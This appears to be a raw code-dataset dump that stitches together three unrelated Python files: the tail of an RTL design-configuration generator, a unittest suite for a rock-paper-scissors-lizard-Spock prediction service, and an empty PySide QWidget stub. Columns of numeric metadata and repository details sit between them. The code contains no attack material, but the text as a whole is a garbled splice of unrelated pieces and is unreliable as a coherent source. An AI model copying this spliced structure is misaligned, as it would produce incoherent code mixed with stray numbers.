    the systematic <prefix>_L4_xx_L3_yy_L2_zz_DVAFS_d identifier."""
    default = "{}_L4_{}_L3_{}_L2_{}_DVAFS_{}".format(prefix, l4, l3, l2, dvafs)
    return _NAMED_DESIGNS.get((prefix, l4, l3, l2, dvafs), default)


def _design_entry(l4, l3, l2, bg, dvafs):
    """Build one RTL parameter record.

    The two-bit L2 code is repeated to form the four-bit L2_MODE field
    ("10" -> "1010"), matching the original hand-written table.
    """
    return {
        "SDC_MODE": "L4_prec_only",
        "L4_MODE": l4,
        "L3_MODE": l3,
        "L2_MODE": l2 * 2,
        "BG": bg,
        "DVAFS": dvafs,
    }


def _build_design_cfg():
    """Generate all 72 benchmarked configurations.

    Replaces the former ~600-line literal; insertion order reproduces the
    original table exactly, so iteration order is unchanged.
    """
    cfg = {}
    # Bit-groups at L2 (BG="00"), DVAFS off: full L4 x L3 x L2 sweep.
    for l4 in _MODES:
        for l3 in _MODES:
            for l2 in _MODES:
                cfg[_design_name("BG_L2", l4, l3, l2, "0")] = \
                    _design_entry(l4, l3, l2, "00", "0")
    # Bit-groups at L2, DVAFS on: only symmetric L2 codes ("00"/"11").
    for l4 in _MODES:
        for l3 in _MODES:
            for l2 in ("00", "11"):
                cfg[_design_name("BG_L2", l4, l3, l2, "1")] = \
                    _design_entry(l4, l3, l2, "00", "1")
    # Bit-groups at L3 (BG="01"): L2 codes "10"/"11". L2 is the OUTER loop to
    # reproduce the original ordering (all *_L2_10 before *_L2_11 per L4).
    for l4 in _MODES:
        for l2 in ("10", "11"):
            for l3 in _MODES:
                cfg[_design_name("BG_L3", l4, l3, l2, "0")] = \
                    _design_entry(l4, l3, l2, "01", "0")
    # Fully bit-serial (BG="11"): L2 fixed at "11".
    for l4 in _MODES:
        for l3 in _MODES:
            cfg[_design_name("BG_BS", l4, l3, "11", "0")] = \
                _design_entry(l4, l3, "11", "11", "0")
    return cfg


# RTL parameters for all benchmarked designs, keyed by design name.
DESIGN_CFG = _build_design_cfg()
| 40.395425
| 77
| 0.282582
| 2,104
| 24,722
| 2.819392
| 0.050856
| 0.106204
| 0.109238
| 0.157788
| 0.899191
| 0.899191
| 0.899191
| 0.898854
| 0.898854
| 0.897505
| 0
| 0.164712
| 0.548135
| 24,722
| 612
| 78
| 40.395425
| 0.366306
| 0.033412
| 0
| 0.7487
| 0
| 0
| 0.280131
| 0.093508
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6204ebeb1960659f6c4520ffb48e8e3de3a9caee
| 30,765
|
py
|
Python
|
src/tests/services/logic_service_test.py
|
hhautajarvi/kps-tekoaly
|
9dd72c60e34a98fdf11a8292bc5152848ce2044a
|
[
"MIT"
] | null | null | null |
src/tests/services/logic_service_test.py
|
hhautajarvi/kps-tekoaly
|
9dd72c60e34a98fdf11a8292bc5152848ce2044a
|
[
"MIT"
] | null | null | null |
src/tests/services/logic_service_test.py
|
hhautajarvi/kps-tekoaly
|
9dd72c60e34a98fdf11a8292bc5152848ce2044a
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import patch
from random import Random
from services.logic_service import LogicService
class LogicServiceTest(unittest.TestCase):
def setUp(self):
    """Create a fresh service and a deterministically seeded PRNG per test."""
    self.random = Random(666)
    self.logic_service = LogicService()

def test_constructor(self):
    """A new service starts with zero recorded choices in game mode 1."""
    service = self.logic_service
    self.assertEqual(0, service._number_of_choices)
    self.assertEqual(1, service._game_mode)

def test_change_game_mode(self):
    """change_game_mode stores the requested mode."""
    service = self.logic_service
    service.change_game_mode(2)
    self.assertEqual(2, service._game_mode)
# check_winner result matrix. Choice codes: 0=sakset (scissors), 1=kivi
# (rock), 2=paperi (paper), 3=spock, 4=lisko (lizard). Result strings:
# "Voitit" (you win), "Tasapeli" (draw), "Hävisit" (you lose).

def test_check_winner_kivi_vs_sakset(self):
    """Rock beats scissors."""
    self.assertEqual("Voitit", self.logic_service.check_winner(1, 0))

def test_check_winner_kivi_vs_kivi(self):
    """Rock vs rock is a draw."""
    self.assertEqual("Tasapeli", self.logic_service.check_winner(1, 1))

def test_check_winner_kivi_vs_paperi(self):
    """Rock loses to paper."""
    self.assertEqual("Hävisit", self.logic_service.check_winner(1, 2))

def test_check_winner_kivi_vs_spock(self):
    """Rock loses to Spock."""
    self.assertEqual("Hävisit", self.logic_service.check_winner(1, 3))

def test_check_winner_kivi_vs_lisko(self):
    """Rock beats lizard."""
    self.assertEqual("Voitit", self.logic_service.check_winner(1, 4))

def test_check_winner_sakset_vs_sakset(self):
    """Scissors vs scissors is a draw."""
    self.assertEqual("Tasapeli", self.logic_service.check_winner(0, 0))

def test_check_winner_sakset_vs_kivi(self):
    """Scissors lose to rock."""
    self.assertEqual("Hävisit", self.logic_service.check_winner(0, 1))

def test_check_winner_sakset_vs_paperi(self):
    """Scissors beat paper."""
    self.assertEqual("Voitit", self.logic_service.check_winner(0, 2))

def test_check_winner_sakset_vs_spock(self):
    """Scissors lose to Spock."""
    self.assertEqual("Hävisit", self.logic_service.check_winner(0, 3))

def test_check_winner_sakset_vs_lisko(self):
    """Scissors beat lizard."""
    self.assertEqual("Voitit", self.logic_service.check_winner(0, 4))

def test_check_winner_paperi_vs_sakset(self):
    """Paper loses to scissors."""
    self.assertEqual("Hävisit", self.logic_service.check_winner(2, 0))

def test_check_winner_paperi_vs_kivi(self):
    """Paper beats rock."""
    self.assertEqual("Voitit", self.logic_service.check_winner(2, 1))

def test_check_winner_paperi_vs_paperi(self):
    """Paper vs paper is a draw."""
    self.assertEqual("Tasapeli", self.logic_service.check_winner(2, 2))

def test_check_winner_paperi_vs_spock(self):
    """Paper beats Spock."""
    self.assertEqual("Voitit", self.logic_service.check_winner(2, 3))

def test_check_winner_paperi_vs_lisko(self):
    """Paper loses to lizard."""
    self.assertEqual("Hävisit", self.logic_service.check_winner(2, 4))

def test_check_winner_spock_vs_sakset(self):
    """Spock beats scissors."""
    self.assertEqual("Voitit", self.logic_service.check_winner(3, 0))

def test_check_winner_spock_vs_kivi(self):
    """Spock beats rock."""
    self.assertEqual("Voitit", self.logic_service.check_winner(3, 1))

def test_check_winner_spock_vs_paperi(self):
    """Spock loses to paper."""
    self.assertEqual("Hävisit", self.logic_service.check_winner(3, 2))

def test_check_winner_spock_vs_spock(self):
    """Spock vs Spock is a draw."""
    self.assertEqual("Tasapeli", self.logic_service.check_winner(3, 3))

def test_check_winner_spock_vs_lisko(self):
    """Spock loses to lizard."""
    self.assertEqual("Hävisit", self.logic_service.check_winner(3, 4))

def test_check_winner_lisko_vs_sakset(self):
    """Lizard loses to scissors."""
    self.assertEqual("Hävisit", self.logic_service.check_winner(4, 0))

def test_check_winner_lisko_vs_kivi(self):
    """Lizard loses to rock."""
    self.assertEqual("Hävisit", self.logic_service.check_winner(4, 1))

def test_check_winner_lisko_vs_paperi(self):
    """Lizard beats paper."""
    self.assertEqual("Voitit", self.logic_service.check_winner(4, 2))

def test_check_winner_lisko_vs_spock(self):
    """Lizard beats Spock."""
    self.assertEqual("Voitit", self.logic_service.check_winner(4, 3))

def test_check_winner_lisko_vs_lisko(self):
    """Lizard vs lizard is a draw."""
    self.assertEqual("Tasapeli", self.logic_service.check_winner(4, 4))
def test_add_choice(self):
    """A single choice updates the history, the trie and the counter."""
    service = self.logic_service
    service.add_choice(1)
    self.assertEqual(1, len(service._choices))
    self.assertEqual(1, service._trie.get_value("1"))
    self.assertEqual(1, service._number_of_choices)

def test_add_two_choices(self):
    """Two choices create both 1-gram and 2-gram trie entries."""
    service = self.logic_service
    for _ in range(2):
        service.add_choice(1)
    self.assertEqual(2, len(service._choices))
    self.assertEqual(1, service._trie.get_value("11"))
    self.assertEqual(2, service._trie.get_value("1"))
    self.assertEqual(2, service._number_of_choices)

def test_add_six_choice(self):
    """Six choices: n-gram counts accumulate for several key lengths."""
    service = self.logic_service
    for user_choice in (1, 1, 0, 2, 1, 0):
        service.add_choice(user_choice)
    self.assertEqual(6, len(service._choices))
    self.assertEqual(2, service._trie.get_value("0"))
    self.assertEqual(3, service._trie.get_value("1"))
    self.assertEqual(2, service._trie.get_value("10"))
    self.assertEqual(1, service._trie.get_value("11021"))
    self.assertEqual(1, service._trie.get_value("10210"))
    self.assertEqual(1, service._trie.get_value("2"))
    self.assertEqual(6, service._number_of_choices)

def test_add_eleven_choice(self):
    """After 11 adds the stored history holds 10 items while the counter is 11."""
    service = self.logic_service
    for user_choice in (1, 1, 0, 2, 1, 0, 1, 1, 0, 2, 1):
        service.add_choice(user_choice)
    self.assertEqual(10, len(service._choices))
    self.assertEqual(11, service._number_of_choices)
def test_cpu_choice_only_kivi_2_len(self):
    """After nothing but rock (1), the CPU counters with paper (2)."""
    for _ in range(3):
        self.logic_service.add_choice(1)
    self.assertEqual(2, self.logic_service.cpu_choice(2))

def test_cpu_choice_only_paperi_2_len(self):
    """After nothing but paper (2), the CPU counters with scissors (0)."""
    for _ in range(3):
        self.logic_service.add_choice(2)
    self.assertEqual(0, self.logic_service.cpu_choice(2))

def test_cpu_choice_only_sakset_2_len(self):
    """After nothing but scissors (0), the CPU counters with rock (1)."""
    for _ in range(3):
        self.logic_service.add_choice(0)
    self.assertEqual(1, self.logic_service.cpu_choice(2))

def test_cpu_choice_alternate_sakset_kivi_2_len(self):
    """Strict scissors/rock alternation leads the CPU to play rock (1)."""
    for user_choice in (0, 1) * 4:
        self.logic_service.add_choice(user_choice)
    self.assertEqual(1, self.logic_service.cpu_choice(2))

def test_cpu_choice_alternate_sakset_kivi_differently_2_len(self):
    """The prediction adapts as the observed pattern changes mid-game."""
    for user_choice in (0, 0, 0, 1, 0, 1, 0, 1, 0):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(2, self.logic_service.cpu_choice(2))  # paperi
    for user_choice in (0, 0, 2, 0, 0):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(1, self.logic_service.cpu_choice(2))  # kivi
# Fix: the mock's PUBLIC `side_effect` attribute is assigned instead of the
# private `_mock_side_effect` internal the original reached into. The wrong
# "#choose paperi" comments are corrected: per this file's mapping the
# asserted value 1 is kivi (rock).

@patch('services.logic_service.randint')
def test_cpu_choice_random_choice_one_previous(self, randint):
    """With a single recorded choice the CPU falls back to randint."""
    randint.side_effect = self.random.randint  # route to the seeded PRNG
    self.logic_service.add_choice(0)
    self.assertEqual(self.logic_service.cpu_choice(2), 1)  # kivi (seed 666)

@patch('services.logic_service.randint')
def test_cpu_choice_random_choice_no_precedent_2_len(self, randint):
    """No matching 2-gram precedent: the CPU falls back to randint."""
    randint.side_effect = self.random.randint
    for user_choice in (0, 2, 0, 1):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(self.logic_service.cpu_choice(2), 1)  # kivi (seed 666)

@patch('services.logic_service.randint')
def test_cpu_choice_random_choice_one_previous_mode2(self, randint):
    """Mode 2, single recorded choice: random fallback over five options."""
    self.logic_service.change_game_mode(2)
    randint.side_effect = self.random.randint
    self.logic_service.add_choice(4)
    self.assertEqual(self.logic_service.cpu_choice(2), 3)  # choose spock

@patch('services.logic_service.randint')
def test_cpu_choice_random_choice_no_precedent_2_len_mode2(self, randint):
    """Mode 2, no 2-gram precedent: random fallback over five options."""
    randint.side_effect = self.random.randint
    self.logic_service.change_game_mode(2)
    for user_choice in (0, 3, 2, 4):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(self.logic_service.cpu_choice(2), 3)  # choose spock
def test_calculate_no_precedent_2_len(self):
    """No matching 2-gram precedent: _calculate returns the sentinel 5."""
    for user_choice in (0, 2, 0, 1):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(5, self.logic_service._calculate(2))

def test_calculate_1_len(self):
    """1-gram prediction picks the dominant choice, sakset (0)."""
    for user_choice in (0, 2, 0):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(0, self.logic_service._calculate(1))

def test_calculate_4_len(self):
    """4-gram prediction on a repeating pattern picks sakset (0)."""
    for user_choice in (0, 2, 2, 0, 2, 2, 0):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(0, self.logic_service._calculate(4))
@patch('services.logic_service.randint')
def test_calculate_random_choice_three_choices_2_len(self, randint):
    """Three tied continuations after "00": randint breaks the tie.

    Fix: assigns the mock's public ``side_effect`` attribute instead of the
    private ``_mock_side_effect`` internal.
    """
    randint.side_effect = self.random.randint  # seeded PRNG decides
    for user_choice in (0, 0, 2, 0, 0, 1, 0, 0, 0):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(self.logic_service._calculate(2), 1)  # choose kivi
# Fix: the mock's PUBLIC `side_effect` attribute is assigned instead of the
# private `_mock_side_effect` internal. The last test's "#choose paperi"
# comment is corrected: per this file's mapping the asserted value 1 is kivi.
# The long hand-written add_choice sequences are collapsed into their
# repeating patterns (identical call order).

@patch('services.logic_service.choice')
def test_calculate_random_choice_two_choices_kp_2_len(self, choice):
    """Tie between kivi and paperi continuations: `choice` breaks it."""
    choice.side_effect = self.random.choice  # seeded PRNG decides
    for user_choice in (0, 0, 2, 0, 0, 1) * 3 + (0, 0):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(self.logic_service._calculate(2), 2)  # choose paperi

@patch('services.logic_service.choice')
def test_calculate_random_choice_two_choices_sk_2_len(self, choice):
    """Tie between sakset and kivi continuations: `choice` breaks it."""
    choice.side_effect = self.random.choice
    for user_choice in (2, 2, 0, 2, 2, 1) * 3 + (2, 2):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(self.logic_service._calculate(2), 2)  # choose paperi

@patch('services.logic_service.choice')
def test_calculate_random_choice_two_choices_sp_2_len(self, choice):
    """Tie between sakset and paperi continuations: `choice` breaks it."""
    choice.side_effect = self.random.choice
    for user_choice in (1, 1, 0, 1, 1, 2) * 3 + (1, 1):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(self.logic_service._calculate(2), 1)  # choose kivi
# Fix: the mock's PUBLIC `side_effect` attribute is assigned instead of the
# private `_mock_side_effect` internal.

@patch('services.logic_service.choice')
def test_calculate_lizard_1_len_mode2(self, choice):
    """Mode 2: dominant lisko history yields prediction 1 (kivi)."""
    choice.side_effect = self.random.choice  # seeded PRNG for tie-breaks
    self.logic_service.change_game_mode(2)
    for user_choice in (3, 4, 3):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(self.logic_service._calculate(1), 1)  # kivi

@patch('services.logic_service.choice')
def test_calculate_spock_1_len_mode2(self, choice):
    """Mode 2: dominant spock history yields prediction 4 (lisko)."""
    choice.side_effect = self.random.choice
    self.logic_service.change_game_mode(2)
    for user_choice in (4, 3, 4):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(self.logic_service._calculate(1), 4)  # lisko

@patch('services.logic_service.choice')
def test_calculate_paper_1_len_mode2(self, choice):
    """Mode 2: dominant kivi history yields prediction 4 (lisko)."""
    choice.side_effect = self.random.choice
    self.logic_service.change_game_mode(2)
    for user_choice in (1, 2, 1):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(self.logic_service._calculate(1), 4)  # lisko

@patch('services.logic_service.choice')
def test_calculate_rock_1_len_mode2(self, choice):
    """Mode 2: dominant sakset history yields prediction 3 (spock)."""
    choice.side_effect = self.random.choice
    self.logic_service.change_game_mode(2)
    for user_choice in (0, 1, 0):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(self.logic_service._calculate(1), 3)  # spock
def test_calculate_scissors_lizard_1_len_mode2(self):
    """Mode 2: history of 1 with 0/4 mixed in predicts 1 (kivi)."""
    self.logic_service.change_game_mode(2)
    for user_choice in (1, 0, 1, 4, 1):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(1, self.logic_service._calculate(1))

def test_calculate_scissors_spock_lizard_1_len_mode2(self):
    """Mode 2: history of 1 with 0/4/3 mixed in predicts 1 (kivi)."""
    self.logic_service.change_game_mode(2)
    for user_choice in (1, 0, 1, 4, 1, 3, 1):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(1, self.logic_service._calculate(1))

def test_calculate_scissors_paper_1_len_mode2(self):
    """Mode 2: history of 1 with 0/2 mixed in predicts 0 (sakset)."""
    self.logic_service.change_game_mode(2)
    for user_choice in (1, 0, 1, 2, 1):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(0, self.logic_service._calculate(1))

def test_calculate_scissors_paper_lizard_1_len_mode2(self):
    """Mode 2: history of 1 with 0/2/4 mixed in predicts 0 (sakset)."""
    self.logic_service.change_game_mode(2)
    for user_choice in (1, 0, 1, 2, 1, 4, 1):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(0, self.logic_service._calculate(1))

def test_calculate_scissors_spock_paper_1_len_mode2(self):
    """Mode 2: history of 1 with 0/3/2 mixed in predicts 4 (lisko)."""
    self.logic_service.change_game_mode(2)
    for user_choice in (1, 0, 1, 3, 1, 2, 1):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(4, self.logic_service._calculate(1))

def test_calculate_scissors_rock_1_len_mode2(self):
    """Mode 2: history of 2 with 0/1 mixed in predicts 3 (spock)."""
    self.logic_service.change_game_mode(2)
    for user_choice in (2, 0, 2, 1, 2):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(3, self.logic_service._calculate(1))

def test_calculate_scissors_rock_lizard_1_len_mode2(self):
    """Mode 2: history of 2 with 0/1/4 mixed in predicts 1 (kivi)."""
    self.logic_service.change_game_mode(2)
    for user_choice in (2, 0, 2, 1, 2, 4, 2):
        self.logic_service.add_choice(user_choice)
    self.assertEqual(1, self.logic_service._calculate(1))
def test_calculate_scissors_rock_spock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 3) #spock
def test_calculate_scissors_rock_paper_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(1)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.assertEqual(self.logic_service._calculate(1), 3) #spock
def test_calculate_scissors_spock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 3) #spock
@patch('services.logic_service.choice')
def test_calculate_scissors_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(1), 3) #spock
@patch('services.logic_service.randint')
def test_calculate_random_choice_5_choices_1_len_mode2(self, randint):
randint._mock_side_effect = self.random.randint
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 3) #choose spock
@patch('services.logic_service.choice')
def test_calculate_random_4_spcl_choices_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(3)
self.logic_service.add_choice(1)
self.logic_service.add_choice(4)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service._calculate(1), 4) #choose lisko
@patch('services.logic_service.choice')
def test_calculate_random_4_skcl_choices_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 3) #choose spock
@patch('services.logic_service.choice')
def test_calculate_random_4_skpl_choices_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(1)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(4)
self.logic_service.add_choice(3)
self.assertEqual(self.logic_service._calculate(1), 1) #choose kivi
@patch('services.logic_service.choice')
def test_calculate_random_4_skpc_choices_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(1)
self.logic_service.add_choice(4)
self.logic_service.add_choice(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(3)
self.logic_service.add_choice(4)
self.assertEqual(self.logic_service._calculate(1), 3) #choose spock
def test_calculate_rock_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 1) #kivi
def test_calculate_rock_spock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 2) #paperi
def test_calculate_rock_spock_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(3)
self.logic_service.add_choice(2)
self.logic_service.add_choice(4)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service._calculate(1), 2) #paperi
def test_calculate_rock_paper_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 2) #paperi
def test_calculate_rock_paper_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 0) #sakset
def test_calculate_rock_paper_spock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 2) #paperi
@patch('services.logic_service.choice')
def test_calculate_random_4_kpcl_choices_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 4) # lisko
@patch('services.logic_service.choice')
def test_calculate_paper_lizard_1_len_mode2(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 0) # sakset
def test_calculate_paper_spock_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 4) #lisko
def test_calculate_paper_spock_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 4) #lisko
def test_calculate_spock_lizard_1_len_mode2(self):
self.logic_service.change_game_mode(2)
self.logic_service.add_choice(0)
self.logic_service.add_choice(3)
self.logic_service.add_choice(0)
self.logic_service.add_choice(4)
self.logic_service.add_choice(0)
self.assertEqual(self.logic_service._calculate(1), 4) #lisko
def test_find_best_chain_length_not_enough_choices(self):
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service.find_best_chain_length(), 2)
def test_find_best_chain_length_one(self):
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.assertEqual(self.logic_service.find_best_chain_length(), 1)
@patch('services.logic_service.choice')
def test_find_best_chain_length_two(self, choice):
choice._mock_side_effect = self.random.choice
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(0)
self.logic_service.add_choice(0)
self.logic_service.add_choice(1)
self.logic_service.add_choice(1)
self.logic_service.add_choice(2)
self.logic_service.add_choice(2)
self.assertEqual(self.logic_service.find_best_chain_length(), 2)
| 42.201646
| 84
| 0.710418
| 4,385
| 30,765
| 4.621209
| 0.020753
| 0.30379
| 0.387683
| 0.337544
| 0.975276
| 0.969651
| 0.960768
| 0.95302
| 0.930961
| 0.850474
| 0
| 0.026977
| 0.191516
| 30,765
| 728
| 85
| 42.259615
| 0.787722
| 0.012709
| 0
| 0.786378
| 0
| 0
| 0.026512
| 0.02028
| 0
| 0
| 0
| 0
| 0.148607
| 1
| 0.126935
| false
| 0
| 0.006192
| 0
| 0.134675
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6213de6890da1be84c80ae4f4d9340747aa8a204
| 21,813
|
py
|
Python
|
resources/dot_PyCharm/system/python_stubs/-762174762/PySide/QtGui/QWidget.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | 1
|
2020-04-20T02:27:20.000Z
|
2020-04-20T02:27:20.000Z
|
resources/dot_PyCharm/system/python_stubs/cache/8cdc475d469a13122bc4bc6c3ac1c215d93d5f120f5cc1ef33a8f3088ee54d8e/PySide/QtGui/QWidget.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | null | null | null |
resources/dot_PyCharm/system/python_stubs/cache/8cdc475d469a13122bc4bc6c3ac1c215d93d5f120f5cc1ef33a8f3088ee54d8e/PySide/QtGui/QWidget.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# module PySide.QtGui
# from C:\Python27\lib\site-packages\PySide\QtGui.pyd
# by generator 1.147
# no doc
# imports
import PySide.QtCore as __PySide_QtCore
import Shiboken as __Shiboken
from QPaintDevice import QPaintDevice
class QWidget(__PySide_QtCore.QObject, QPaintDevice):
# no doc
def acceptDrops(self, *args, **kwargs): # real signature unknown
pass
def accessibleDescription(self, *args, **kwargs): # real signature unknown
pass
def accessibleName(self, *args, **kwargs): # real signature unknown
pass
def actionEvent(self, *args, **kwargs): # real signature unknown
pass
def actions(self, *args, **kwargs): # real signature unknown
pass
def activateWindow(self, *args, **kwargs): # real signature unknown
pass
def addAction(self, *args, **kwargs): # real signature unknown
pass
def addActions(self, *args, **kwargs): # real signature unknown
pass
def adjustSize(self, *args, **kwargs): # real signature unknown
pass
def autoFillBackground(self, *args, **kwargs): # real signature unknown
pass
def backgroundRole(self, *args, **kwargs): # real signature unknown
pass
def baseSize(self, *args, **kwargs): # real signature unknown
pass
def changeEvent(self, *args, **kwargs): # real signature unknown
pass
def childAt(self, *args, **kwargs): # real signature unknown
pass
def childrenRect(self, *args, **kwargs): # real signature unknown
pass
def childrenRegion(self, *args, **kwargs): # real signature unknown
pass
def clearFocus(self, *args, **kwargs): # real signature unknown
pass
def clearMask(self, *args, **kwargs): # real signature unknown
pass
def close(self, *args, **kwargs): # real signature unknown
pass
def closeEvent(self, *args, **kwargs): # real signature unknown
pass
def contentsMargins(self, *args, **kwargs): # real signature unknown
pass
